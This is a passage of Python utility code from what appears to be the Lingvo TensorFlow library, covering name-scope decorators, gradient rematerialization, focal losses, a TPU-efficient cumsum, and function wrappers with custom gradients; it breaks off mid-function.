        UpdateDtype(element, dtype)
    elif name == 'dtype':
      params.dtype = dtype
def NameScopeDecorator(name_scope):
  """Decorates a python function to introduce a tf.name_scope.

  Example::

      @py_utils.NameScopeDecorator('foobar')
      def MyFoobarMethod(self):
        # ... Do TF things

  Args:
    name_scope: The name scope to introduce.

  Returns:
    A function decorator.
  """
  # Local import keeps the fix self-contained without touching the module's
  # top-level imports.
  import functools

  def Decorator(f):
    # functools.wraps preserves the wrapped function's __name__, __doc__ and
    # other metadata; without it every decorated function showed up as
    # 'Wrapped' in debuggers, docs and error messages.
    @functools.wraps(f)
    def Wrapped(*args, **kwargs):
      with tf.name_scope(name_scope):
        return f(*args, **kwargs)

    return Wrapped

  return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
  """Returns debug strings for the given sequences.

  Args:
    ids: int32 of [batch, len].
    lens: int32 of [batch].
    summarize: number of ids to summarize per sequence.

  Returns:
    A string tensor of [batch].
  """
  num_seqs = tf.shape(lens)[0]

  def _Body(i, result):
    # Format only the unpadded prefix of row i.
    line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
    return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)

  i0 = tf.zeros(shape=[], dtype=tf.int32)
  result0 = tf.constant('', shape=[0], dtype=tf.string)
  # The result grows by one row per iteration, hence the [None] shape
  # invariant on the accumulator.
  _, strs = tf.while_loop(
      lambda i, result: i < num_seqs,
      _Body, (i0, result0),
      shape_invariants=(i0.shape, tf.TensorShape([None])))
  return strs
# TODO(jamesqin): follow suggestions in
# b/167460492#comment16
def RematerializeFn(fn, *xs):
  """Calls fn and rematerializes fn in the backward pass.

  `fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of
  tensors.

  Args:
    fn: A python function to be rematerialized in the backprop pass.
    *xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
      fn function.

  Returns:
    `fn(*xs)`
  """
  initial_step_seed = GetStepSeed()
  final_step_seed = MaybeGenerateSeedFromScope()

  def Backward(fwd_xs, fwd_ys, d_fwd_ys):
    """The backward function that rematerializes forward outputs."""
    del fwd_ys
    # uniform([]) is in [0, 1), so this predicate is always true; it exists
    # only to force tf.where to produce fresh copies of the inputs below.
    always_true = tf.random.uniform([]) < 2.0
    # Alternatively, can do this:
    # tf.where(tf.math.is_nan(x),
    #          tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
    #          x)
    bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in fwd_xs.xs]
    for dst, src in zip(bak_xs, xs):
      dst.set_shape(src.shape)
    # Re-run the forward computation under the original step seed so that
    # any step-seeded randomness inside fn matches the forward pass.
    ResetStepSeed(initial_step_seed)
    ys = fn(*bak_xs)
    MaybeResetStepSeed(final_step_seed)
    dxs = tf.gradients(ys, bak_xs, grad_ys=d_fwd_ys)
    # Replace None gradients with zeros so the returned structure matches
    # the inputs one-to-one.
    dxs_final = []
    for dx, x in zip(dxs, bak_xs):
      if dx is None:
        dxs_final.append(tf.zeros_like(x))
      else:
        dxs_final.append(dx)
    assert len(dxs_final) == len(bak_xs)
    return NestedMap(
        initial_step_seed=tf.zeros_like(initial_step_seed), xs=dxs_final)

  ys_shapes = []

  # TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
  def Forward(fwd_xs):
    """Forward function plus sanity checks."""
    for dst, src in zip(fwd_xs.xs, xs):
      dst.set_shape(src.shape)
    ResetStepSeed(fwd_xs.initial_step_seed)
    ys = fn(*fwd_xs.xs)
    # Some sanity check.
    assert not GetExtraInputs()
    assert not GetExtraArgs()
    assert not GetExtraVars()
    if isinstance(ys, tuple):
      for y in ys:
        assert isinstance(y, tf.Tensor)
        ys_shapes.append(y.shape)
    else:
      assert isinstance(ys, tf.Tensor)
      ys_shapes.append(ys.shape)
    return ys

  ys = CallDefun(
      Forward,
      NestedMap(initial_step_seed=initial_step_seed, xs=xs),
      bak=Backward)
  # Restore the static shapes recorded inside Forward; they are lost across
  # the CallDefun boundary.
  if isinstance(ys, tuple):
    for y, s in zip(ys, ys_shapes):
      y.set_shape(s)
  else:
    ys.set_shape(ys_shapes[0])
  # TODO(b/129159299): The ResetStepSeed below is needed to work around this
  # bug, which is a problem with global tensors being shared by different
  # inference graphs. It should be replaced with the new step seed value
  # returned from the Forward function when the bug is fixed.
  MaybeResetStepSeed(final_step_seed)
  return ys
# A set of names of stateful random number generator ops; consulted by
# StatefulRandomOpsInDefun below to flag ops that would produce inconsistent
# values between FProp and BProp.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = frozenset({
    # pyformat: disable
    'RandomUniform',
    'RandomUniformInt',
    'RandomStandardNormal',
    'ParameterizedTruncatedNormal',
    'TruncatedNormal',
    'RandomShuffle',
    'Multinomial',
    'RandomGamma',
    'RandomPoisson',
    'RandomPoissonV2',
    # pyformat: enable
})
def StatefulRandomOpsInDefun(func, graph=None):
  """Checks whether the Defun depends on stateful random number ops.

  Stateful random number generator ops should be avoid in Recurrent() call.
  Otherwise, these ops produce inconsistent values between FProp and BProp.

  Args:
    func: a _DefinedFunction or ConcreteFunction to check.
    graph: a Graph. Set None to use the default graph.

  Returns:
    A list of names of the stateful random ops.

  Raises:
    InvalidArgumentError: if the input func/graph is invalid.
  """
  if graph is None:
    graph = tf.get_default_graph()
  func.add_to_graph(graph)
  graph_def = graph.as_graph_def()

  # A dict from function name to FunctionDef.
  func_defs = {x.signature.name: x for x in graph_def.library.function}
  if isinstance(func, function._DefinedFunction):  # pylint: disable=protected-access
    if func.definition.signature.name not in func_defs:
      raise tf.errors.InvalidArgumentError(
          None, None, 'Defun {} is not in the graph .'.format(
              func.definition.signature.name))
    nodes = py_collections.deque(func.definition.node_def)
  else:
    nodes = py_collections.deque(func.function_def.node_def)

  def _AddDefunNodes(func_name):
    """If the given func_name is a Defun, add its sub-nodes into nodes."""
    if func_name in func_defs:
      nodes.extend(func_defs[func_name].node_def)

  stateful_ops = []
  # Breadth-less worklist search through the node graph for stateful random
  # ops. (The helper above is defined once instead of being rebuilt on every
  # loop iteration, as it only closes over `func_defs` and `nodes`.)
  while nodes:
    node = nodes.pop()
    assert isinstance(node, node_def_pb2.NodeDef), node
    if node.op in _STATEFUL_RANDOM_OPS:
      stateful_ops.append(node.name)
      continue
    # For functional.{While|For|If} ops, add their Defun attr into search.
    if node.op == 'While':
      _AddDefunNodes(node.attr['body'].func.name)
      _AddDefunNodes(node.attr['cond'].func.name)
    elif node.op == 'For':
      _AddDefunNodes(node.attr['body'].func.name)
    elif node.op == 'If':
      _AddDefunNodes(node.attr['then_branch'].func.name)
      _AddDefunNodes(node.attr['else_branch'].func.name)
    elif node.op == 'StatefulPartitionedCall':
      _AddDefunNodes(node.attr['f'].func.name)
    elif node.op != 'PartitionedCall':
      # For other op, check whether itself is a Defun op.
      _AddDefunNodes(node.op)
  return stateful_ops
def ToPlaceholders(nmap, dtype=None):
  """Converts every Tensor in nmap to a placeholder."""

  def _ToPlaceholder(x):
    # Keep only the innermost dim static; all leading dims become dynamic.
    dynamic_shape = [None for _ in x.shape[:-1]] + [x.shape[-1]]
    return tf.placeholder(dtype=dtype or x.dtype, shape=dynamic_shape)

  return nmap.Transform(_ToPlaceholder)
def Softmax(logits, axis=None, extra_logit=None, name=None):
  """Softmax with extra_logits, might be useful for large xformer LM."""
  if extra_logit is None:
    # No extra logit: plain softmax.
    return tf.nn.softmax(logits, axis=axis, name=name)
  axis = -1 if axis is None else axis

  def ReduceLogSumExp(x):
    # Standard max-subtraction for numerical stability; the base also covers
    # extra_logit so none of the exponentials below can overflow.
    max_logit = tf.math.reduce_max(
        tf.stop_gradient(x), axis=axis, keepdims=True)
    base_logit = tf.math.maximum(max_logit, extra_logit)
    x -= base_logit
    exp_x = tf.math.exp(x)
    sum_exp_x = tf.math.reduce_sum(exp_x, axis=axis, keepdims=True)
    # Fold the extra logit into the partition function.
    sum_exp_x += tf.math.exp(extra_logit - base_logit)
    return tf.math.log(sum_exp_x) + base_logit

  def LogSoftmax(x):
    return x - ReduceLogSumExp(x)

  with tf.name_scope(name):
    return tf.math.exp(LogSoftmax(logits))
def SoftmaxCrossEntropyFocalLoss(logits,
                                 label_ids=None,
                                 label_probs=None,
                                 alpha=None,
                                 gamma=None,
                                 stop_gradient_on_focal_loss_coefficient=False):
  u"""Focal loss for multinomial (softmax) logistic loss.

  [1] Focal loss https://arxiv.org/abs/1708.02002

  Args:
    logits: [..., C]. Logits for the multinomial logistic regression. C is the
      number of classes.
    label_ids: [...]. Each entry in labels must be an index in [0, C).
    label_probs: [..., C]. Each vector along last dimension must be a valid
      probability distribution.
    alpha: [C]. The weighting factor alpha. Eq (3) in [1].
    gamma: []. Tunable focusing parameter. Eq (4) in [1].
    stop_gradient_on_focal_loss_coefficient: If true, stops gradient on the
      focal loss coefficient (1-p)^gamma to stabilize the gradient.

  Returns:
    loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
  """

  def _ApplyFocalLossCoefficient(loss, log_probs):
    # Modulating factor (1-p)ˠ, Eq (4) in [1]; no-op when gamma is unset or 0.
    if gamma is not None and gamma != 0:
      probs = tf.exp(log_probs)
      coefficient = tf.pow(1.0 - probs, gamma)
      if stop_gradient_on_focal_loss_coefficient:
        coefficient = tf.stop_gradient(coefficient)
      loss *= coefficient
    return loss

  if label_probs is not None:
    # Dense-label branch: per-class cross entropy, modulated per class, then
    # reduced over the class dimension.
    log_probs = tf.nn.log_softmax(logits)
    loss = -(label_probs * log_probs)
    loss = _ApplyFocalLossCoefficient(loss, log_probs)
    if alpha is not None:
      # Broadcast the per-class alpha across all leading dimensions.
      loss *= tf.reshape(
          alpha, tf.concat([tf.ones(tf.rank(loss) - 1, tf.int32), [-1]],
                           axis=0))
    loss = tf.reduce_sum(loss, axis=-1)
  else:
    # Sparse-label branch: here loss == -log(pₜ), so -loss == log(pₜ) is
    # exactly the log-probability the focal coefficient needs.
    loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels=label_ids, logits=logits)
    loss = _ApplyFocalLossCoefficient(loss, -loss)
    if alpha is not None:
      loss *= tf.gather(alpha, label_ids)
  return loss
def SigmoidCrossEntropyFocalLoss(logits, labels, alpha=None, gamma=None):
  u"""Focal loss for binary (sigmoid) logistic loss.

  [1] Focal loss https://arxiv.org/abs/1708.02002

  Args:
    logits: [..., C]. Logits for the sigmoid logistic regression.
    labels: [..., C]. 0/1 labels.
    alpha: The weighting factor alpha. Eq (3) in [1].
    gamma: Tunable focusing parameter. Eq (4) in [1].

  Returns:
    loss[i..., j] = FL(pₜ) = - αₜ(1-pₜ)ˠlog(pₜ) Eq (5) in [1].
  """
  # [1] Eq (4): numerically-stable log(p) for positives and log(1 - p) for
  # negatives.
  loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels, logits=logits)
  if gamma is not None and gamma != 0:
    # The modulating factor (1-pₜ)ˠ. Note that
    #   (1 - p)ˠ = [1 - σ(x)]ˠ = [σ(-x)]ˠ for positives, and
    #   pˠ = [σ(x)]ˠ for negatives,
    # both of which equal σ(x·(1 - 2·label))ˠ.
    modulator = tf.pow(tf.sigmoid(logits * (1 - labels * 2)), gamma)
    loss *= modulator
  if alpha is not None:
    # [1] Eq (3): class-balancing weight αₜ.
    balance = alpha * labels + (1 - alpha) * (1 - labels)
    loss *= balance
  return loss
_RECORD_FORMAT_RE = re.compile('(^[A-Za-z_]+):(.*)')


def RecordFormatFromFilePattern(file_pattern):
  """Return the record format string for a Lingvo file pattern.

  Lingvo file patterns take the form of:

    tfrecord:/path/to/bar -> tfrecord is the record_format.

  This function takes a file pattern and returns a string indicating
  which format the filepattern implies.

  Args:
    file_pattern: String file pattern.

  Returns:
    Tuple (string, string):

      - record_format: String record format, e.g., "tfrecord", etc.
      - file_pattern: The file pattern without any prefixes.
  """
  match = _RECORD_FORMAT_RE.match(file_pattern)
  if match is None:
    # No recognized prefix; assume the legacy default record format.
    # TODO(vrv): Fix all callers so that file_pattern must contain
    # the record format prefix.
    return 'sstable', file_pattern
  # A match guarantees exactly two groups: (record_format, bare pattern).
  return match.groups()
def ReadFileLines(file_path):
  """Read a text file and return the lines.

  If the file cannot be found at the given path, attempt to load it from the
  Lingvo package (useful for data dependencies in par files).

  Args:
    file_path: path to file, either absolute or relative to the bazel
      workspace.

  Returns:
    A list of lines from the file.
  """
  if not tf.io.gfile.exists(file_path):
    try:
      # Fall back to package data bundled with the lingvo package.
      # NOTE(review): pkgutil.get_data returns bytes, so this branch yields
      # bytes lines while the GFile branch yields str — confirm that callers
      # tolerate both.
      lines = pkgutil.get_data(
          'lingvo', file_path.replace('lingvo/', '', 1))
      if lines:
        lines = lines.splitlines(True)
    except IOError:
      # If pkgutil can't find the file, continue and let GFile raise the error.
      lines = None
  else:
    lines = None
  if not lines:
    with tf.io.gfile.GFile(file_path, 'r') as f:
      lines = f.readlines()
  return lines
# Partially borrowed from
# https://github.com/tensorflow/tensor2tensor/blob/32929305e1a4ec926eff24123758b794df35492b/tensor2tensor/layers/common_layers.py#L349
def CumSum(x, axis=0, exclusive=False, use_einsum=False):
  """A TPU efficient implementation of tf.cumsum().

  This is equivalent to tf.cumsum and is faster on TPU as of 08/2019 unless
  the axis dimension is very large. The current Tensorflow implementation is
  based on scanning and reducing which is not efficient on TPU.

  Args:
    x: An input Tensor.
    axis: An int for the axis.
    exclusive: A bool for performing exclusive cumsum.
    use_einsum: If true, use einsum on TPU.

  Returns:
    A Tensor of the same shape as x.

  Raises:
    ValueError: if the input axis is invalid.
  """
  if x.dtype not in (tf.float32, tf.bfloat16) or not use_tpu():
    # Fallback to tf.cumsum when inputs are not floats or not running on TPU.
    return tf.cumsum(x, axis=axis, exclusive=exclusive)
  rank = GetRank(x)
  # Needs to know the rank for the final transpose if axis is not the last
  # dimension. Otherwise, falls back to tf.cumsum.
  if not isinstance(rank, int) and axis != -1:
    return tf.cumsum(x, axis=axis, exclusive=exclusive)
  if axis < -1:
    if axis + rank < 0:
      raise ValueError('Unexpected axis: %d (rank = %d)' % (axis, rank))
    axis += rank
  if use_einsum:
    assert isinstance(rank, int) and rank < 26, rank
    # Use einsum to avoid data formatting overhead.
    a2z = ''.join([chr(i) for i in range(97, 123)])  # abc...xyz
    src = a2z[:rank]
    if axis == -1:
      tgt = src[:-1] + 'z'
    else:
      tgt = src[:axis] + 'z' + src[axis + 1:]
    length = GetShape(x)[axis]
    # causal_mask[i, z] == 1 iff input position i contributes to output z.
    causal_mask = tf.linalg.band_part(
        tf.ones([length, length], dtype=x.dtype), 0, -1)
    if exclusive:
      # BUG FIX: the einsum path previously ignored `exclusive` and always
      # computed an inclusive cumsum (the upper-triangular mask includes the
      # diagonal). Drop the diagonal so position i does not contribute to
      # output i, matching tf.cumsum(..., exclusive=True).
      causal_mask -= tf.eye(length, dtype=x.dtype)
    return tf.einsum(f'{src},{src[axis]}z->{tgt}', x, causal_mask)
  length = GetShape(x)[axis]
  my_range = tf.range(length)
  # mask[i, j] == 1 iff input i contributes to output j: i <= j for the
  # inclusive cumsum, i < j for the exclusive one.
  comparator = tf.less if exclusive else tf.less_equal
  mask = tf.cast(
      comparator(tf.expand_dims(my_range, 1), tf.expand_dims(my_range, 0)),
      x.dtype)
  result = tf.tensordot(x, mask, axes=[[axis], [0]])
  if axis != -1 and axis != rank - 1:
    # tensordot moves the contracted axis to the end; rotate it back.
    result = tf.transpose(
        result,
        list(range(axis)) + [rank - 1] + list(range(axis, rank - 1)))
  return result
def ProjectLastDim(inputs, weight, input_dim, output_dim):
  """Linear projection on the last dim of the input tensor.

  This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
  tensor by using Einsum for the compute.

  Args:
    inputs: An input Tensor, the last dimension of which is input_dim.
    weight: A weight matrix with shape [input_dim, output_dim].
    input_dim: An integer or a symbolic dim, the last dimension of the inputs.
    output_dim: An integer or a symbolic dim, the last dimension of the
      outputs.

  Returns:
    An output Tensor of the same rank as inputs, the last dimension is
    output_dim.
  """
  # Resolve symbolic dims into static integers.
  if symbolic.IsExpr(input_dim):
    input_dim = symbolic.ToStatic(input_dim)
  input_dim = int(input_dim)
  if symbolic.IsExpr(output_dim):
    output_dim = symbolic.ToStatic(output_dim)
  output_dim = int(output_dim)

  # Runtime-check that inputs and weight agree with the declared dims.
  inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
                             inputs)
  weight = with_dependencies([
      assert_equal(GetShape(weight)[0], input_dim),
      assert_equal(GetShape(weight)[-1], output_dim)
  ], weight)

  rank = inputs.shape.rank if inputs.shape is not None else None
  if use_tpu() and rank is not None and rank < 26:
    # Avoids reshape if feasible and uses Einsum.
    if rank == 2:
      return tf.matmul(inputs, weight)
    # This is equivalent to:
    #   outputs = tf.einsum('...y,yz->...z', inputs, weight)
    # Unfortunately ... in einsum() leads to extra HBM usage.
    alphabet = ''.join([chr(c) for c in range(97, 123)])  # abc...xyz
    return tf.einsum('{0}y,yz->{0}z'.format(alphabet[:rank - 1]), inputs,
                     weight)

  # Generic path: flatten to rank 2, multiply, then restore leading dims.
  flat = Matmul(tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight)
  return tf.reshape(
      flat,
      tf.concat([
          tf.cast(GetShape(inputs)[:-1], tf.int32),
          ToStaticShape([output_dim])
      ],
                axis=0))
@contextlib.contextmanager
def RemoveAssertContext(remove=True):
  """Hacks to replace certain unwanted tensorflow ops."""
  # TODO(zhifengc/huangyp): Consider implementing assert_equal
  # op replacement for lingvo. As assert_equal doesn't support String on GPUs.
  # Hack to replace tf.assert_equal
  # TODO(b/136040013): Remove this after migration to tf.function.
  if not remove:
    yield
    return

  def _NoOp(*args, **kwargs):  # pylint: disable=unused-argument
    return tf.no_op()

  saved = tf.check_ops.assert_equal
  tf.check_ops.assert_equal = _NoOp  # Make assert_equal a no op.
  try:
    yield
  finally:
    # Always restore the real op, even if the body raised.
    tf.check_ops.assert_equal = saved
def _AssertInputsMatch(op, args, implicit_captures):
  """Assert that op's inputs match with args and implicit_captures.

  Args:
    op: The operation to check.
    args: A nested structure representing the explicit arguments of 'op'.
    implicit_captures: A nested structure representing the implicitly captured
      inputs of 'op'.

  Raises:
    ValueError: if the number of inputs mismatch.
  """
  expected_inputs = Flatten([args, implicit_captures])
  actual_count = len(op.inputs)
  expected_count = len(expected_inputs)
  if actual_count > expected_count:
    raise ValueError(('Too many inputs. The most likely cause is that fwd '
                      'captures additional tensors: extra inputs %r vs %r '
                      'captures=%r') % (list(op.inputs), list(expected_inputs),
                                        list(Flatten(implicit_captures))))
  if actual_count < expected_count:
    raise ValueError(('Mismatched inputs to fwd: Found %d vs expected %d: %r'
                      '. Implicit captures(%d) = %r') %
                     (actual_count, expected_count, list(op.inputs),
                      len(Flatten(implicit_captures)), implicit_captures))
def TensorSpecs(nmap, keep_shape=True):
  """Transforms tensors in the input nested structure to TensorSpecs."""
  if nmap is None:
    return None

  def _ToSpec(t):
    # Drop the shape (keep only dtype) when keep_shape is False.
    return tf.TensorSpec(t.shape if keep_shape else None, t.dtype)

  return Transform(_ToSpec, nmap)
def _DefineDefun(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
  """Wraps fwd in a defun with custom gradient bak.

  Args:
    fwd: A callable xs: Nested Structure -> ys: Nested Structure.
    fwd_sig: A Nested Structure of tf.TensorSpec representing the input
      signature of `fwd`, or None (meaning that fwd takes no inputs).
    bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
      Structure. The custom backprop function for `fwd`. bak needs to return
      dcapture if fwd uses any implicitly captured tensors, whose gradients are
      dcapture.
    bak_as_function: Whether to create a TF graph function for `bak`.
    device: the device on which to run `fwd` and `bak`.

  Returns:
    A NestedMap containing:

    - call: A callable that will execute `fwd`. It has the same input and output
      signatures as `fwd`.
    - func: The underlying TF function that `call` calls. If not None, it will
      be a _DefinedFunction or ConcreteFunction that takes flat inputs and
      returns flat outputs, and can be used by routines that require a TF
      function object (e.g. tf.If, tf.While, etc).
      Always not None when `bak` is None.
    - output_dtypes: A nested structure compatible with the outputs of `fwd`
      containing the corresponding output dtypes.
    - stateful_ops: A list of (op_name, op_type) tuples representing the
      stateful ops used by `fwd`.
    - captured_inputs: Implicit inputs captured by `fwd`.
  """
  assert fwd is not None
  # This Defun-based path always allows inlining (contrast with
  # _DefineFunction, which sets noinline based on use_xla()).
  noinline = False
  if fwd_sig is None:
    fwd_sig = []
  # Flatten the input signature into parallel lists of dtypes and shapes;
  # tf.Defun below is declared over the flat dtypes.
  get_dtype = lambda x: x.dtype
  arg_dtypes = Flatten(Transform(get_dtype, fwd_sig))
  get_shape = lambda x: x.shape
  arg_shapes = Flatten(Transform(get_shape, fwd_sig))
  # Used to hold the backward function used by Grad, which will be defined if
  # bak is set.
  sigs = NestedMap()
  # Output of this method.
  res = NestedMap()
  python_grad_func = None
  if bak:
    def Grad(op, *args):
      """Gradient function for the forward function.

      Args:
        op: The forward operation.
        *args: Gradients wrt op.outputs.

      Returns:
        Tuple of derivatives.
      """
      _AssertInputsMatch(op, fwd_sig, res.captured_inputs)
      # Ensure dys contains no None.
      args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
      xs = op.inputs[:len(arg_dtypes)]  # The rest are captures.
      # sigs.backward is bound later below, before any gradient can run.
      return sigs.backward(*Flatten([xs, op.outputs, args]))
    python_grad_func = Grad
  def _SetShape(dst_list, shape_list):
    # Propagate static shape information onto the flat tensors.
    for dst, shape in zip(dst_list, shape_list):
      if isinstance(dst, tf.Tensor):
        dst.set_shape(shape)
  @tf.Defun(*arg_dtypes, python_grad_func=python_grad_func, noinline=noinline)
  def Forward(*args):
    """The forward function."""
    _SetShape(args, arg_shapes)
    with RemoveAssertContext(remove=noinline):
      call = lambda: fwd(Pack(fwd_sig, args)) if args else fwd()
      if device is None:
        # Defun will handle the device assignment.
        rets = call()
      else:
        with tf.device(device):
          rets = call()
    # Record the structured outputs as a side effect of tracing; read below
    # after add_to_graph() forces the trace.
    res.outputs = rets
    return Flatten(rets)
  forward = Forward
  if not arg_dtypes:
    # In this case Forward is an _OverloadedFunction, we need to instantiate it.
    forward = Forward.instantiate([])
  # Invokes fwd() to get res.outputs.
  forward.add_to_graph(tf.get_default_graph())
  res.func = forward
  res.stateful_ops = forward.stateful_ops
  res.captured_inputs = forward.captured_inputs
  output_dtypes = Transform(get_dtype, res.outputs)
  output_shapes = Transform(get_shape, res.outputs)
  def Call(args=None):
    """Wrapper of fwd."""
    if args is None:
      flat_rets = forward()
    else:
      flat_rets = forward(*Flatten(args))
    if not isinstance(flat_rets, (tuple, list)):
      flat_rets = [flat_rets]
    # Defun loses static shapes; restore them from the traced outputs.
    _SetShape(flat_rets, Flatten(output_shapes))
    return Pack(output_dtypes, flat_rets)
  res.call = Call
  if bak:
    def Backward(*args):
      """The backward function."""
      # args is the flat concatenation of xs, ys and dys.
      _SetShape(args, Flatten([arg_shapes, output_shapes, output_shapes]))
      xs, ys, dys = Pack([fwd_sig, output_dtypes, output_dtypes], args)
      with RemoveAssertContext(remove=noinline):
        if device is None:
          # Defun will handle the device assignment.
          dxs = bak(xs, ys, dys)
        else:
          with tf.device(device):
            dxs = bak(xs, ys, dys)
      return Flatten(dxs)
    if bak_as_function:
      sigs.backward = tf.Defun(
          *Flatten([arg_dtypes, output_dtypes, output_dtypes]),
          noinline=noinline)(
              Backward)
      sigs.backward.add_to_graph(tf.get_default_graph())
    else:
      sigs.backward = Backward
  return res
# Global variable to control rendezvous sharing in tf.function.
# If False (default) rendezvous sharing is disabled in tf.function, that is, the
# function body use a separate rendezvous and can't communicate with parent
# graph via send/recv.
# With _GetSharedRendezvous() == True, the function body share the same
# rendezvous with the parent graph and can talk to it using send/recv. This is
# useful for layers like StackedRecurrent.
_SHARED_RENDEZVOUS = ThreadLocalStack()


@contextlib.contextmanager
def _SharedRendezvousScope(shared_rendezvous=True):
  """Scopes the rendezvous sharing setting for functions defined within."""
  stack = _SHARED_RENDEZVOUS.stack
  stack.append(shared_rendezvous)
  try:
    yield
  finally:
    stack.pop()
def _GetSharedRendezvous():
  """Get the current rendezvous sharing setting."""
  stack = _SHARED_RENDEZVOUS.stack
  if stack:
    return stack[-1]
  # Sharing is disabled by default.
  return False
def _ApplySharedRendezvous(func):
  """Apply the rendezvous sharing setting on the given tf.function func."""
  shared = _GetSharedRendezvous()
  func._shared_rendezvous = shared  # pylint: disable=protected-access
def _WrapFunction(func=None, input_signature=None):
  """Wraps func as a tf.function.

  Usable either directly (`foo = _WrapFunction(foo, sig)`) or as a decorator
  factory (`@_WrapFunction(input_signature=sig)`). Returns the traced
  ConcreteFunction rather than the tf.function wrapper.
  """
  if input_signature is None:
    input_signature = []
  def Decorated(fn):
    # autograph is disabled to keep the traced graph faithful to fn's code.
    @tf.function(input_signature=input_signature, autograph=False)
    def Fn(*args):
      # TODO(b/163904067): mimic Defun' behavior and reset the step seed to
      # avoid it being used as an implicit capture. This is not a desired
      # behavior, it should take the step seed from parent graph instead.
      ResetStepSeed()
      # Mimic Defun and disable collection sharing.
      graph = tf.get_default_graph()
      # Don't share summaries collection with parent graph (b/168745134).
      graph.clear_collection(tf.GraphKeys.SUMMARIES)
      return fn(*args)
    # Propagate the rendezvous sharing setting onto the new function.
    _ApplySharedRendezvous(Fn)
    # Add the function to the graph so it'll be traced under the current
    # context. This is necessary if the function body captures any non-tensor
    # values from the environment, like symbolic maps.
    cf = Fn.get_concrete_function()
    cf.add_to_graph()
    return cf
  # For the `foo = _WrapFunction(foo, ...)` use case.
  if func is not None:
    return Decorated(func)
  # For the `@_WrapFunction(...)` use case.
  return Decorated
def _DefineFunction(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
  """Wraps fwd in a defun with custom gradient bak.

  tf.function-based counterpart of _DefineDefun.

  Args:
    fwd: A callable xs: Nested Structure -> ys: Nested Structure.
    fwd_sig: A Nested Structure of tf.TensorSpec representing the input
      signature of `fwd`, or None (meaning that fwd takes no inputs).
    bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
      Structure. The custom backprop function for `fwd`. bak needs to return
      dcapture if fwd uses any implicitly captured tensors, whose gradients are
      dcapture.
    bak_as_function: Whether to create a TF graph function for `bak`.
    device: the device on which to run `fwd` and `bak`.

  Returns:
    A NestedMap containing:

    - call: A callable that will execute `fwd`. It has the same input and output
      signatures as `fwd`.
    - func: The underlying TF function that `call` calls. If not None, it will
      be a _DefinedFunction or ConcreteFunction that takes flat inputs and
      returns flat outputs, and can be used by routines that require a TF
      function object (e.g. tf.If, tf.While, etc).
      Always not None when `bak` is None.
    - outputs: The outputs of `fwd`. Used for reflection only (e.g. to get the
      output dtypes, shapes, etc).
    - stateful_ops: A list of (op_name, op_type) tuples representing the
      stateful ops used by `fwd`.
    - captured_inputs: Implicit inputs captured by `fwd`.
  """
  assert fwd is not None
  noinline = not use_xla()
  if fwd_sig is None:
    fwd_sig = []
  if device is None:
    # Get the current device to mimic Defun's behavior.
    # pylint: disable=protected-access
    device_funcs = tf.get_default_graph()._device_functions_outer_to_inner
    device = device_funcs[-1] if device_funcs else None
    # pylint: enable=protected-access
  # Output of this method.
  res = NestedMap()
  @_WrapFunction(input_signature=Flatten(fwd_sig))
  def Forward(*args):
    """The forward function."""
    with RemoveAssertContext(remove=noinline), tf.device(device):
      if args:
        xs = Pack(fwd_sig, args)
        rets = fwd(xs)
      else:
        rets = fwd()
    # Recorded during tracing (which _WrapFunction forces eagerly); read
    # below to derive output specs.
    res.outputs = rets
    return Flatten(rets)
  res.captured_inputs = Forward.captured_inputs
  # Get the stateful ops used in cell_fn. Logic borrowed from
  # _EagerDefinedFunction.__init__().
  graph = Forward.graph
  input_ops = set(arg.op for arg in graph.inputs)
  operations = [op for op in graph.get_operations() if op not in input_ops]
  res.stateful_ops = [(o.name, o.type) for o in operations if o._is_stateful]  # pylint: disable=protected-access
  def Call(func, args=None):
    """Wrapper of fwd."""
    if args is None:
      flat_rets = func()
    else:
      flat_rets = func(*Flatten(args))
    if not isinstance(flat_rets, (tuple, list)):
      flat_rets = [flat_rets]
    return Pack(res.outputs, flat_rets)
  if not bak:
    # No custom gradient: expose the concrete function directly.
    res.func = Forward
    res.call = lambda args=None: Call(Forward, args)
    return res
  # Snapshot the sharing setting now so the (possibly deferred) backward call
  # observes the same value as the forward definition.
  shared_rendezvous = _GetSharedRendezvous()
  ret_specs = TensorSpecs(res.outputs)
  def Backward(*args):
    # args is the flat concatenation of xs, ys and dys.
    xs, ys, dys = Pack([fwd_sig, ret_specs, ret_specs], args)
    with RemoveAssertContext(remove=noinline), tf.device(device):
      dxs = bak(xs, ys, dys)
    return Flatten(dxs)
  if bak_as_function:
    backward_cf = _WrapFunction(
        Backward, input_signature=Flatten([fwd_sig, ret_specs, ret_specs]))
  else:
    def BackwardWithSharedRendezvous(*args):
      with _SharedRendezvousScope(shared_rendezvous):
        return Backward(*args)
    backward_cf = BackwardWithSharedRendezvous
  @tf.custom_gradient
  def ForwardWithGrad(*args):
    """Forward function and its custom gradient."""
    # Note that `args` includes implicit captures. This is required by
    # tf.custom_gradient so that when the Grad() outputs include gradients to
    # implicit captures, they match the inputs to ForwardWithGrad().
    #
    # However, Forward doesn't take implicit captures as input, so we exclude
    # them here.
    fwd_args = args[:(len(args) - len(Flatten(res.captured_inputs)))]
    op = NestedMap(inputs=args, outputs=Forward(*fwd_args))
    def Grad(*args, **kwargs):
      """Gradient function for the forward function.

      Args:
        *args: Gradients wrt op.outputs.
        **kwargs: Additional arguments from tf.custom_gradient.

      Returns:
        Tuple of derivatives.
      """
      if kwargs:
        tf.logging.warning(
            'Ignoring additional arguments used by tf.custom_gradient: %s',
            str(kwargs))
